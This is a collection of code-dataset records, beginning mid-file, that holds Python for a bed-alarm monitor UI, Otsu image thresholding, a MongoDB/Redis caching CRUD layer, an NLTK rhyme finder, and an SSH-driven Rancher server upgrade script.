patient in the bed\n if self._patientid:\n \"\"\"receiving function for a critical alarm\"\"\"\n self._critalarm = True\n # save the alarm status\n self._critAlarmMonitorTypes[monitortypeid] = [value, direction, unit]\n self._recordBedEvent(constants.BEDEVT_CRITALARM_ON, monitortypeid)\n\n def isCritAlarmOn(self):\n \"\"\"return state of critical alarm\"\"\"\n return self._critalarm\n\n isCritAlarmOn = property(isCritAlarmOn)\n\n def critAlarmOff(self, monitortypeid):\n \"\"\"receiving function for a critical alarm\"\"\"\n self._critalarm = False\n # save the alarm status if this alarm was set\n try:\n del self._critAlarmMonitorTypes[monitortypeid]\n # record the event for auditing\n self._recordBedEvent(constants.BEDEVT_CRITALARM_OFF, monitortypeid)\n except KeyError:\n # ignore, this alarm was not set\n pass\n\n def _recordBedEvent(self, bedeventtype, monitortypeid ):\n \"\"\"record a bed event in the audit trail in the database\"\"\"\n self._db.insert(\"\"\"\n INSERT INTO public.bedevent (eventtime, eventtype, patientid, bedid, monitortypeid)\n VALUES (now(), {}, {}, {}, {})\"\"\".format(bedeventtype, self._patientid, self._bedid, monitortypeid ))\n\n def UI(self, parentWidget):\n \"\"\"create a QtWidget with all the bed related ui components required\"\"\"\n #create groupbox in parent, size and title appropriately\n BedGroupBox = QtWidgets.QGroupBox(parentWidget)\n BedGroupBox.setFixedWidth(830)\n BedGroupBox.setObjectName(\"BedGroupBox\" + str(self._bedid))\n BedGroupBox.setTitle(QtCore.QCoreApplication.translate(\"MainWindow\", \"Bed: \" + str(self._bedid)))\n #create vertical layout inside groupbox to put monitors and controls in\n verticalLayoutWidget = QtWidgets.QWidget(BedGroupBox)\n verticalLayoutWidget.setGeometry(QtCore.QRect(100, 20, 741, 0))\n verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\" + str(self._bedid))\n verticalLayout_2 = QtWidgets.QVBoxLayout(verticalLayoutWidget)\n verticalLayout_2.setContentsMargins(0, 0, 0, 0)\n verticalLayout_2.setObjectName(\"verticalLayout\" + str(self._bedid))\n #create checkbox to indicate alarms\n BedAlarm = QtWidgets.QCheckBox(BedGroupBox)\n BedAlarm.setGeometry(QtCore.QRect(0, 20, 101, 20))\n BedAlarm.setObjectName(\"BedAlarm\" + str(self._bedid))\n BedAlarm.setText(QtCore.QCoreApplication.translate(\"MainWindow\", \"Alarm\"))\n #create checkbox to indicate critical alarms\n BedCritAlarm = QtWidgets.QCheckBox(BedGroupBox)\n BedCritAlarm.setGeometry(QtCore.QRect(0, 40, 101, 20))\n BedCritAlarm.setObjectName(\"BedCritAlarm\" + str(self._bedid))\n BedCritAlarm.setText(QtCore.QCoreApplication.translate(\"MainWindow\", \"CritAlarm\"))\n #create button to add a module to a bed TODO: wire up a method for it.\n BedAddModule = QtWidgets.QPushButton(BedGroupBox)\n BedAddModule.setGeometry(QtCore.QRect(0, 60, 101, 32))\n BedAddModule.setObjectName(\"BedAddModule\" + str(self._bedid))\n BedAddModule.setText(QtCore.QCoreApplication.translate(\"MainWindow\", \"Add Module\"))\n #call children into view\n for module in self._modules:\n verticalLayout_2.addWidget(module.UI(verticalLayoutWidget))\n # resize after adding children\n heights = sum(\n x.frameGeometry().height() for x in iter(\n verticalLayoutWidget.findChildren(QtWidgets.QGroupBox, QtCore.QRegExp(\"ModuleGroupBox.*\")) # must regex out only the Module groupboxes otherwise it's comically oversized\n )\n ) # ugly as sin generator to sum heights of children\n if heights > 0:\n verticalLayoutWidget.setFixedHeight(heights)\n BedGroupBox.setFixedHeight(heights + 25)\n else:\n 
verticalLayoutWidget.setFixedHeight(75)\n BedGroupBox.setFixedHeight(100)\n return BedGroupBox\n","sub_path":"src/bed.py","file_name":"bed.py","file_ext":"py","file_size_in_byte":9343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"369226645","text":"# %%\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n# import cv2\nfrom scipy import ndimage\n\n\ndef show(_img, _title=None):\n plt.figure()\n plt.suptitle(_title)\n plt.imshow(_img, cmap='gray')\n plt.show()\n\n\ndef g(_img, _thresh, Z_E, Z_B):\n N = _img.shape[0]\n M = _img.shape[1]\n res = np.zeros((N, M))\n for i in range(N):\n for j in range(M):\n if _img[i][j] >= _thresh:\n res[i][j] = Z_E\n else:\n res[i][j] = Z_B\n return res\n\n# 类间方差\n\n\ndef mu(p):\n s = 0\n for i in range(len(p)):\n s += i * p[i]\n return s\n\n\ndef sigma(p, mu):\n s = 0\n for i in range(len(p)):\n s += (i - mu) ** 2 * p[i]\n return s\n\n\ndef eta(t, p):\n w0 = np.sum(p[:t])\n w1 = 1 - w0\n mu0 = mu(p[:t]) / w0\n muT = mu(p)\n mu1 = (muT - mu0) / w1\n var_w = sigma(p[:t], mu0) + sigma(p[t:], mu1)\n var_B = w0 * w1 * (mu1 - mu0) ** 2\n return var_B / (var_B + var_w)\n\n\ndef ostu(_img):\n N = _img.shape[0]\n M = _img.shape[1]\n freq = np.zeros((256, 1))\n for i in range(N):\n for j in range(M):\n freq[_img[i][j]] += 1\n freq /= (N * M)\n _eta = np.zeros(freq.shape)\n for t in range(1, 256):\n _eta[t] = eta(t, freq)\n return np.argmax(_eta)\n\n\nimg = np.array(Image.open('C:\\\\Users\\\\29388\\\\Pictures\\\\dip.png'))[:, :, 0]\nshow(img, 'original')\n# %%\n# median filter\n# img_blur = cv2.medianBlur(img, 3)\nimg_blur = ndimage.median_filter(img, 3)\nshow(img_blur, 'blur')\n# %%\n# test with t=128\nres = g(img_blur, 128, 256, 0)\nshow(res, 'test')\n# %%\nt_ostu = ostu(img_blur)\nres_ostu = g(img_blur, t_ostu, 256, 0)\nshow(res_ostu, 'ostu')\n# %%\n# erosion\nimg_eroded = ndimage.grey_erosion(img, 1)\nshow(img_eroded, 'erosion r = 1')\nshow(g(img_eroded, 128, 256, 0), 'test_erosion r = 1')\nshow(g(img_eroded, ostu(img_eroded), 256, 0), 'ostu_erosion r = 1')\nimg_eroded = ndimage.grey_erosion(img, 3)\nshow(img_eroded, 'erosion r = 3')\nshow(g(img_eroded, 128, 256, 0), 'test_erosion r = 3')\nshow(g(img_eroded, ostu(img_eroded), 256, 0), 'ostu_erosion r = 3')\nimg_eroded = ndimage.grey_erosion(img, 5)\nshow(img_eroded, 'erosion r = 5')\nshow(g(img_eroded, 128, 256, 0), 'test_erosion r = 5')\nshow(g(img_eroded, ostu(img_eroded), 256, 0), 'ostu_erosion r = 5')\n# %%\nimg_dilated = ndimage.grey_dilation(img, 1)\nshow(img_dilated, 'dilatation r = 1')\nshow(g(img_dilated, 128, 256, 0), 'test_dilatation r = 1')\nshow(g(img_dilated, ostu(img_dilated), 256, 0), 'ostu_dilatation r = 1')\nimg_dilated = ndimage.grey_dilation(img, 3)\nshow(img_dilated, 'dilatation r = 3')\nshow(g(img_dilated, 128, 256, 0), 'test_dilatation r = 3')\nshow(g(img_dilated, ostu(img_dilated), 256, 0), 'ostu_dilatation r = 3')\nimg_dilated = ndimage.grey_dilation(img, 5)\nshow(img_dilated, 'dilatation r = 5')\nshow(g(img_dilated, 128, 256, 0), 'test_dilatation r = 5')\nshow(g(img_dilated, ostu(img_dilated), 256, 0), 'ostu_dilatation r = 5')\n","sub_path":"Python/DIP/dip3.py","file_name":"dip3.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"237218571","text":"import re\r\nimport datetime\r\nimport configparser\r\nimport redis\r\nimport pickle\r\nimport pymongo\r\nfrom bson.objectid import ObjectId\r\nfrom serializer 
import MappedClassJSONEncoder\r\nfrom connection import create_db_connection\r\n\r\nconfig = configparser.ConfigParser()\r\nconfig.read('C://Users//Zerbs//accounts.sec')\r\ntime_prefix = \"timemong\"\r\n\r\nredis_key_delimiter = \"_\"\r\nclient = create_db_connection(config[\"mongo\"][\"login\"], config[\"mongo\"][\"password\"], config[\"mongo\"][\"path\"])\r\n\r\nredis_connection = redis.StrictRedis(host=config['redis']['host'], port=int(config['redis']['port']), db=0)\r\n\r\ndef write_time_to_redis(key):\r\n global time_prefix\r\n global redis_key_delimiter\r\n str_key = str(key)\r\n if (str_key[:2] == \"b'\"):\r\n str_key = str_key[2:-1]\r\n print(str_key)\r\n redis_connection.set(time_prefix + redis_key_delimiter + str_key, pickle.dumps(datetime.datetime.now()))\r\n\r\ndef get_date(string_date):\r\n if (isinstance(string_date,datetime.datetime)):\r\n return string_date\r\n return datetime.datetime.strptime(string_date, '%d.%m.%Y')\r\n\r\ndef get_date_time(string_date):\r\n if (isinstance(string_date,datetime.datetime)):\r\n return string_date\r\n return datetime.datetime.strptime(string_date, '%d.%m.%Y %H:%M')\r\n\r\ndef get(value):\r\n return value\r\n\r\ndef get_list(value):\r\n return value.replace(\" \",\"\").split(\",\")\r\n\r\ndef get_float(value):\r\n if value == None:\r\n return None\r\n return float(value)\r\n\r\ndef get_worker_date_state_list(value):\r\n #value = '12.12.2017,e88 ; 12.11.2017, e89 '\r\n print(\">>>>\" + value)\r\n result = []\r\n pre_result = value.replace(\" \",\"\").split(\";\")\r\n for item in pre_result:\r\n pair = item.split(\",\")\r\n result.append([get_date(pair[0]), pair[1]])\r\n return result\r\n\r\ndef get_holdings_list(value):\r\n #value = 'e88, 100 ;e89, 200 '\r\n print(\">>>>\" + value)\r\n result = []\r\n pre_result = value.replace(\" \",\"\").split(\";\")\r\n for item in pre_result:\r\n pair = item.split(\",\")\r\n result.append([pair[0], get_float(pair[1])])\r\n return result\r\n\r\n\r\n##\r\ndef find_next_flag(begin_index, command):\r\n print(command)\r\n for i in range(begin_index, len(command)):\r\n if (command[i][0] == \"-\") and (re.match(\"[a-z/-]\",command[i][1])):\r\n print(\"---%s\" % command[i])\r\n return i\r\n return len(command)\r\n\r\ndef get_parameter_cmd(command, code):\r\n try:\r\n index = command.index(code) + 1\r\n value = command[index]\r\n if (value[0] != \"-\") or (re.match(\"[0-9]\",value[1])):\r\n return command[index : find_next_flag(index + 1, command)]\r\n return None\r\n except ValueError:\r\n return None\r\n\r\ndef get_params(result, shorts):\r\n returned = []\r\n for short in shorts:\r\n returned.append(get_joined_value(result, short, \" \"))\r\n return returned\r\n\r\ndef parse(command, parameters_list):\r\n result = []\r\n for parameter in parameters_list:\r\n values = get_parameter_cmd(command, parameter)\r\n if values != None:\r\n result.append([parameter, values])\r\n return result\r\n\r\ndef get_stre(widths):\r\n stre = \"\"\r\n for width in widths:\r\n stre += \"%-\"+str(width)+\"s \"\r\n return stre\r\n\r\ndef get_joined_value(parameters, code, delimiter):\r\n for parameter in parameters:\r\n if code == parameter[0]:\r\n return delimiter.join(parameter[1])\r\n\r\ndef get_full_set(base_class):\r\n return base_class.query.find().all()\r\n\r\ndef get_ids_set(base_class, field_names, field_modifiers, params):\r\n\r\n #client = pymongo.MongoClient('mongodb://%s:%s@%s' % (config[\"mongo\"][\"login\"],\r\n # config[\"mongo\"][\"password\"],\r\n # config[\"mongo\"][\"path\"]))\r\n\r\n db = 
client.barbershopdb\r\n\r\n args = {}\r\n for i in range(len(field_names)):\r\n if (params[i] != None):\r\n if i == 0:\r\n args[field_names[i]] = params[i]\r\n else:\r\n args[field_names[i]] = field_modifiers[i](params[i])\r\n\r\n return [str(item[\"_id\"]) for item in db[str(base_class).split(\"'\")[1].split(\".\")[0]].find(args, {\"_id\":1})][5:]\r\n #print(base_class.query.get(**args))\r\n #return [str(item._id) for item in base_class.query.find(args).all()]\r\n\r\n #return base_class.query.find().all()\r\n\r\ndef get_properties_tuple(item, field_widths, field_names):\r\n result = []\r\n for i in range(len(field_widths)):\r\n if len(str(getattr(item, field_names[i]))) > field_widths[i]:\r\n result.append(str(getattr(item, field_names[i]))[:field_widths[i]-5] + \"...\")\r\n else:\r\n result.append(str(getattr(item, field_names[i])))\r\n return tuple(result)\r\n\r\ndef get_full_properties_tuple(item, field_names):\r\n result = []\r\n for i in range(len(field_names)):\r\n result.append(str(getattr(item, field_names[i])))\r\n return tuple(result)\r\n\r\ndef get_object(field_names, field_values, field_modifiers, base_class):\r\n args = {}\r\n for i in range(len(field_names)):\r\n args[field_names[i]] = field_modifiers[i](field_values[i])\r\n return base_class.query.get(_id = ObjectId(field_values[0]))\r\n #return base_class(**args)\r\n\r\ndef get_entities(command, base_class, field_shorts, field_names, field_modifiers):\r\n global redis_connection\r\n\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n\r\n full_set = []\r\n result = parse(command, field_shorts)\r\n ids = []\r\n params = get_params(result, field_shorts)\r\n redis_key = collection_name + redis_key_delimiter + redis_key_delimiter.join([str(param) for param in params])\r\n get_ids_set(base_class, field_names, field_modifiers, params)\r\n got_from_redis = redis_connection.get(redis_key)\r\n\r\n if (got_from_redis != None):\r\n result = [];\r\n print(\"got from redis\")\r\n unpacked = pickle.loads(got_from_redis)\r\n else:\r\n unpacked = get_ids_set(base_class, field_names, field_modifiers, params)\r\n print(unpacked)\r\n redis_connection.set(redis_key, pickle.dumps(unpacked))\r\n write_time_to_redis(redis_key)\r\n pipe = redis_connection.pipeline()\r\n item_keys = []\r\n for item_id in unpacked:\r\n item_key = collection_name + redis_key_delimiter + item_id\r\n item_keys.append(item_key)\r\n pipe.get(item_key)\r\n write_time_to_redis(item_key)\r\n item_params_set = pipe.execute()\r\n for i in range(len(unpacked)):\r\n if (item_params_set[i] != None):\r\n new_objectss = get_object(field_names, pickle.loads(item_params_set[i]), field_modifiers, base_class)\r\n full_set.append(new_objectss)\r\n else:\r\n right_item = base_class.query.get(_id = ObjectId(unpacked[i]))\r\n full_set.append(right_item)\r\n redis_connection.set(item_keys[i], pickle.dumps(get_full_properties_tuple(right_item, field_names)))\r\n write_time_to_redis(item_keys[i])\r\n #print([str(item,\"utf-8\") for item in pipe.execute()])\r\n return full_set\r\n\r\ndef show_entities(command, base_class, field_shorts, field_names, field_widths, field_modifiers):\r\n stre = get_stre(field_widths)\r\n print(stre % field_names)\r\n for item in get_entities(command, base_class, field_shorts, field_names, field_modifiers):\r\n print(stre % get_properties_tuple(item, field_widths, field_names))\r\n\r\ndef mark_redis_invalid(base_class):\r\n global redis_connection\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n for key in 
redis_connection.scan_iter(collection_name+\"*\"):\r\n print(key)\r\n redis_connection.delete(key)\r\n\r\n##\r\n\r\ndef check_universal(params):\r\n for param in params:\r\n if param != \"None\":\r\n return False\r\n return True\r\n\r\ndef revise_redis_keys_update(redis_keys, modified_key_params_before, modified_key_params_after, item_id):\r\n for key in redis_keys:\r\n current_key_params = str(key)[1:-1].split(redis_key_delimiter)[1:]\r\n #print(current_key_params)\r\n #print(modified_key_params_before)\r\n #print(modified_key_params_after)\r\n contained = True\r\n for i in range(len(modified_key_params_before)):\r\n if (current_key_params[i+1] != \"None\") and (current_key_params[i+1] != modified_key_params_before[i]):\r\n contained = False\r\n break\r\n\r\n contains = True\r\n for i in range(len(modified_key_params_after)):\r\n if (current_key_params[i+1] != \"None\") and (current_key_params[i+1] != modified_key_params_after[i]):\r\n contains = False\r\n break\r\n\r\n if contained and not contains:\r\n old_list = pickle.loads(redis_connection.get(key))\r\n #print(key,\" +++ \",old_list,\" --- \",item_id)\r\n old_list.remove(item_id)\r\n redis_connection.set(key, pickle.dumps(old_list))\r\n write_time_to_redis(key)\r\n elif not contained and contains:\r\n redis_connection.set(key, pickle.dumps(pickle.loads(redis_connection.get(key)) + [item_id]))\r\n write_time_to_redis(key)\r\n\r\n\r\ndef mark_redis_invalid_after_update_enhanced(base_class, modified_key_params_before_set, modified_key_params_after_set, identifiers, collection_name, field_names):\r\n global redis_connection\r\n global prefix\r\n\r\n\r\n #print(modified_key_params_after_set)\r\n for i in range(len(modified_key_params_after_set)):\r\n redis_keys = redis_connection.scan_iter(collection_name+\"*\" + redis_key_delimiter + \"*\" + redis_key_delimiter + \"*\")\r\n #print(\"revise for \",identifiers[i])\r\n revise_redis_keys_update(redis_keys, modified_key_params_before_set[i], modified_key_params_after_set[i], identifiers[i])\r\n\r\ndef mark_redis_invalid_after_update(base_class, modified_key_params, entities, collection_name, field_names):\r\n global redis_connection\r\n global prefix\r\n\r\n if not check_universal(modified_key_params):\r\n item_keys = []\r\n pipe = redis_connection.pipeline()\r\n for item in entities:\r\n item_id = get_properties_tuple(item, [10 for i in range(len(field_names))], field_names)[0]\r\n item_key = collection_name + redis_key_delimiter + item_id\r\n item_keys.append(item_key)\r\n pipe.get(item_key)\r\n write_time_to_redis(item_key)\r\n\r\n item_params_set = pipe.execute()\r\n for i in range(len(entities)):\r\n if (item_params_set != None):\r\n redis_connection.set(item_keys[i], pickle.dumps(get_full_properties_tuple(entities[i], field_names)))\r\n write_time_to_redis(item_keys[i])\r\n #redis_connection.delete(item_key)\r\n\r\n for key in redis_connection.scan_iter(collection_name+\"*\" + redis_key_delimiter + \"*\" + redis_key_delimiter + \"*\"):\r\n current_key_params = str(key)[2:-1].split(redis_key_delimiter)[1:]\r\n #if check_universal(current_key_params) and not check_universal(modified_key_params):\r\n # redis_connection.delete(key)\r\n # continue\r\n for i in range(len(modified_key_params)):\r\n if (modified_key_params[i] != \"None\") and (current_key_params[i+1] != \"None\"):\r\n redis_connection.delete(key)\r\n break\r\n\r\ndef revise_redis_keys(redis_keys, modified_key_params, append, item_id):\r\n for key in redis_keys:\r\n current_key_params = 
str(key)[1:-1].split(redis_key_delimiter)[1:]\r\n #if check_universal(current_key_params):\r\n # redis_connection.delete(key)\r\n # continue\r\n broken = False\r\n for i in range(len(modified_key_params)):\r\n if (current_key_params[i+1] != \"None\") and (current_key_params[i+1] != modified_key_params[i]):\r\n broken = True\r\n break\r\n if not broken:\r\n if append:\r\n redis_connection.set(key, pickle.dumps(pickle.loads(redis_connection.get(key)) + [item_id]))\r\n write_time_to_redis(key)\r\n else:\r\n old_list = pickle.loads(redis_connection.get(key))\r\n old_list.remove(item_id)\r\n redis_connection.set(key, pickle.dumps(old_list))\r\n write_time_to_redis(key)\r\n #redis_connection.delete(key)\r\n\r\ndef mark_redis_invalid_after_create(base_class, modified_key_params, collection_name, field_names, item_id):\r\n global redis_connection\r\n global prefix\r\n\r\n redis_keys = redis_connection.scan_iter(collection_name+\"*\" + redis_key_delimiter + \"*\" + redis_key_delimiter + \"*\")\r\n revise_redis_keys(redis_keys, modified_key_params, True, item_id)\r\n\r\ndef mark_redis_invalid_after_delete(base_class, deleted_items, collection_name, field_names):\r\n global redis_connection\r\n global prefix\r\n\r\n for item in deleted_items:\r\n redis_keys = redis_connection.scan_iter(collection_name+\"*\" + redis_key_delimiter + \"*\" + redis_key_delimiter + \"*\")\r\n redis_connection.delete(collection_name + redis_key_delimiter + str(item._id))\r\n modified_key_params = get_full_properties_tuple(item, field_names)[1:]\r\n revise_redis_keys(redis_keys, modified_key_params, False, str(item._id))\r\n\r\n##\r\n\r\ndef delete(command, base_class, field_shorts, field_names, field_modifiers, session):\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n entities = get_entities(command, base_class, field_shorts, field_names, field_modifiers)\r\n for item in entities:\r\n item.delete()\r\n session.flush_all()\r\n mark_redis_invalid_after_delete(base_class, entities, collection_name, field_names)\r\n #mark_redis_invalid(base_class)\r\n\r\ndef update(command, base_class, field_shorts, field_names, field_modifiers, session):\r\n entities = get_entities(command, base_class, field_shorts, field_names, field_modifiers)\r\n result = parse(command, [\"-\"+field_short for field_short in field_shorts[1:]])\r\n params = get_params(result,[\"-\"+field_short for field_short in field_shorts[1:]])\r\n\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n modified_key_params_before_set = []\r\n modified_key_params_after_set = []\r\n identifiers = []\r\n\r\n for item in entities:\r\n modified_key_params_before_set.append(get_full_properties_tuple(item, field_names)[1:])\r\n\r\n for i in range(len(params)):\r\n if (params[i] != None):\r\n for item in entities:\r\n setattr(item, field_names[i + 1], field_modifiers[ i + 1 ](params[i]))\r\n\r\n session.flush_all()\r\n\r\n for item in entities:\r\n identifiers.append(str(item._id))\r\n modified_key_params_after_set.append(get_full_properties_tuple(item, field_names)[1:])\r\n\r\n\r\n if not check_universal([str(param) for param in params]):\r\n item_keys = []\r\n pipe = redis_connection.pipeline()\r\n for item in entities:\r\n item_id = get_full_properties_tuple(item, field_names)[0]\r\n item_key = collection_name + redis_key_delimiter + item_id\r\n item_keys.append(item_key)\r\n pipe.get(item_key)\r\n write_time_to_redis(item_key)\r\n item_params_set = pipe.execute()\r\n for i in range(len(entities)):\r\n if (item_params_set != 
None):\r\n redis_connection.set(item_keys[i], pickle.dumps(get_full_properties_tuple(entities[i], field_names)))\r\n write_time_to_redis(item_keys[i])\r\n\r\n mark_redis_invalid_after_update_enhanced(base_class, modified_key_params_before_set, modified_key_params_after_set, identifiers, collection_name, field_names)\r\n #mark_redis_invalid(base_class)\r\n\r\ndef create(command, base_class, field_shorts, field_names, field_modifiers, session):\r\n result = parse(command, field_shorts)\r\n args = {}\r\n collection_name = str(base_class).split(\"'\")[1].split(\".\")[0]\r\n params = []\r\n\r\n for i in range(len(field_names) - 1):\r\n params.append(str(get_joined_value(result, field_shorts[ i + 1], \" \")))\r\n if field_modifiers[ i + 1](get_joined_value(result, field_shorts[ i + 1], \" \")) is None:\r\n continue\r\n args[field_names[i + 1]] = field_modifiers[ i + 1](get_joined_value(result, field_shorts[ i + 1], \" \"))\r\n\r\n new_object = base_class(**args)\r\n session.flush_all()\r\n\r\n item_key = collection_name + redis_key_delimiter + str(new_object._id)\r\n redis_connection.set(item_key, pickle.dumps(get_full_properties_tuple(new_object, field_names)))\r\n\r\n mark_redis_invalid_after_create(base_class, params, collection_name, field_names, str(new_object._id))\r\n return new_object\r\n\r\n##\r\n\r\ndef get_create_rules(cmd, field_status, field_shorts, field_names, field_descriptions):\r\n for i in range(len(field_status)):\r\n if field_status[i] == 1:\r\n opening_brace = \" [ \"\r\n closing_brace = \" ] \"\r\n elif field_status[i] == 2:\r\n opening_brace = \" \"\r\n closing_brace = \" \"\r\n else:\r\n continue\r\n cmd += opening_brace + field_shorts[i] + \" \" + field_names[i] + \" \" + field_descriptions[i] + closing_brace\r\n return cmd\r\n\r\ndef get_read_delete_rules(cmd, field_status, field_shorts, field_names, field_descriptions):\r\n for i in range(len(field_status)):\r\n cmd += \" [ \" + field_shorts[i] + \" \" + field_names[i] + \" \" + field_descriptions[i] + \" ] \"\r\n return cmd\r\n\r\ndef get_update_rules(cmd, field_status, field_shorts, field_names, field_descriptions):\r\n for i in range(len(field_status)):\r\n if field_status[i] == 0:\r\n continue\r\n cmd += \" [ \" + field_shorts[i] + \" \" + field_names[i] + \" \" + field_descriptions[i] + \" ] \"\r\n cmd += \" [ \" + \"-\" + field_shorts[i] + \" \" + field_names[i] + \" \" + \"new value\" + \" ] \"\r\n return cmd\r\n","sub_path":"python_mongo_crud/api/commons_.py","file_name":"commons_.py","file_ext":"py","file_size_in_byte":17729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"614123060","text":"import nltk\r\nimport nltk.corpus\r\n\r\n\r\ndef findrhyme(phones):\r\n # scan backwards for the last stressed vowel (primary or secondary stress)\r\n for i in range(1, len(phones) + 1):\r\n if phones[-i][-1] in '12':\r\n return phones[-i:]\r\n\r\nentries = nltk.corpus.cmudict.entries()\r\nprondict = nltk.corpus.cmudict.dict()\r\nrhymedict = {}\r\nfor word, pron in entries:\r\n rhyme = findrhyme(pron)\r\n if rhyme is None:\r\n continue\r\n # lists are unhashable, so key the dict on a tuple\r\n rhyme = tuple(rhyme)\r\n if rhyme in rhymedict:\r\n rhymedict[rhyme].add(word)\r\n else:\r\n rhymedict[rhyme] = {word}\r\n\r\ndef searchrhyme(word):\r\n wrdrhyme = findrhyme(prondict[word][0]) if word in prondict else None\r\n if wrdrhyme is not None:\r\n rhymelist = rhymedict[tuple(wrdrhyme)] - {word}\r\n print(word + \" rhymes with:\\n\")\r\n print(', '.join(sorted(rhymelist)))\r\n else:\r\n print(word + \" is not in the dictionary. 
Sorry!\")\r\n\r\nif __name__ == \"__main__\":\r\n searchrhyme('fire')","sub_path":"findrhymes.py","file_name":"findrhymes.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"215136038","text":"import argparse\nimport requests\nimport time\nimport paramiko\nimport os\nimport logging\nimport sys\n\nlogger = logging.getLogger(__name__)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', help='target version')\n parser.add_argument('-s', help='server node')\n parser.add_argument('-u', help='ssh username of rancher server host')\n parser.add_argument('-i', help='ssh key path', default=\"~/.ssh/id_rsa\")\n parser.add_argument('-o', help='timeout duration for rancher server to be ready', default=90)\n args = parser.parse_args()\n logger.info(args)\n logger.setLevel(logging.INFO)\n upgrade(args.t, args.s, args.u, args.i, args.o)\n\ndef upgrade(target, servernode, username, keypath, timeout):\n\n logger.info(\"UPGRADING RANCHER SERVER TO TARGET\")\n\n i = 1\n #\n # Try to connect to the host.\n # Retry a few times if it fails.\n #\n while i <= 30:\n logger.info(\"Trying to connect to %s (%i/30)\", servernode, i)\n try:\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n privatekeyfile = os.path.expanduser(keypath)\n mykey = paramiko.RSAKey.from_private_key_file(privatekeyfile)\n ssh.connect(servernode, username=username, pkey=mykey)\n logger.info(\"Connected to %s\", servernode)\n break\n except paramiko.AuthenticationException:\n logger.info(\"Authentication failed when connecting to %s\",\n servernode)\n sys.exit(1)\n except:\n logger.info(\"Could not SSH to %s, waiting for it to start\",\n servernode)\n i += 1\n time.sleep(2)\n\n # If we could not connect within time limit\n if i > 30:\n logger.info(\"Could not connect to %s. Giving up. 
\"\n \"Please check private key file.\", servernode)\n ssh.close()\n sys.exit(1)\n try:\n cmd = \"sudo docker ps\"\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n response = stdout.readlines()\n logger.info(\"response of cmd %s is: %s\", cmd, response)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker stop $(sudo docker ps -q | awk '{print $1}')\"\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n server_container_id = stdout.readlines()[0].strip(\"\\n\")\n logger.info(server_container_id)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker ps -a | awk ' NR>1 {print $2}' | cut -d \\: -f 2\"\n\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n tag_of_previous_rancher_server = stdout.readlines()[0].strip(\"\\n\")\n logger.info(\"tag_of_previous_rancher_server is: %s,\",\n tag_of_previous_rancher_server)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker create --volumes-from \" + server_container_id + \\\n \" --name rancher-data rancher/server:\" \\\n + tag_of_previous_rancher_server\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n response = stdout.readlines()\n logger.info(\"response of cmd %s is: %s\", cmd, response)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker pull rancher/server:\" + target\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n response = stdout.readlines()\n logger.info(\"response of cmd %s is: %s\", cmd, response)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker run -d --volumes-from rancher-data \" \\\n \"--restart=always -p 8080:8080 rancher/server:\" + target\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n response = stdout.readlines()\n logger.info(\"response of cmd %s is: %s\", cmd, response)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker ps | awk ' NR>1 {print $2}' | cut -d \\: -f 2\"\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n tag_of_rancher_version_after_upgrade = \\\n stdout.readlines()[0].strip(\"\\n\")\n logger.info(\"tag_of_rancher_version_after_upgrade is: %s\",\n tag_of_rancher_version_after_upgrade)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n try:\n cmd = \"sudo docker ps | awk ' NR>1 {print $8}' \"\n # Send the command (non-blocking)\n stdin, stdout, stderr = ssh.exec_command(cmd)\n state_of_rancher_server_container_after_upgrade = \\\n stdout.readlines()[0].strip(\"\\n\")\n logger.info(\"state_of_rancher_server_container_after_upgrade is: %s\",\n state_of_rancher_server_container_after_upgrade)\n except:\n logger.info(\"Execution of cmd %s failed\", cmd)\n\n time.sleep(int(timeout))\n\n if tag_of_rancher_version_after_upgrade == target and \\\n state_of_rancher_server_container_after_upgrade == \"Up\":\n server = 'http://' + servernode + \":8080\"\n if requests.get(server).status_code == 200:\n logger.info(\n \"UPGRADE RANCHER SERVER TO TARGET COMPLETE AND SUCCESSFUL\")\n\n ssh.close()\n\nif __name__ == '__main__':\n logging.info(\"Starting upgrade tool...\")\n 
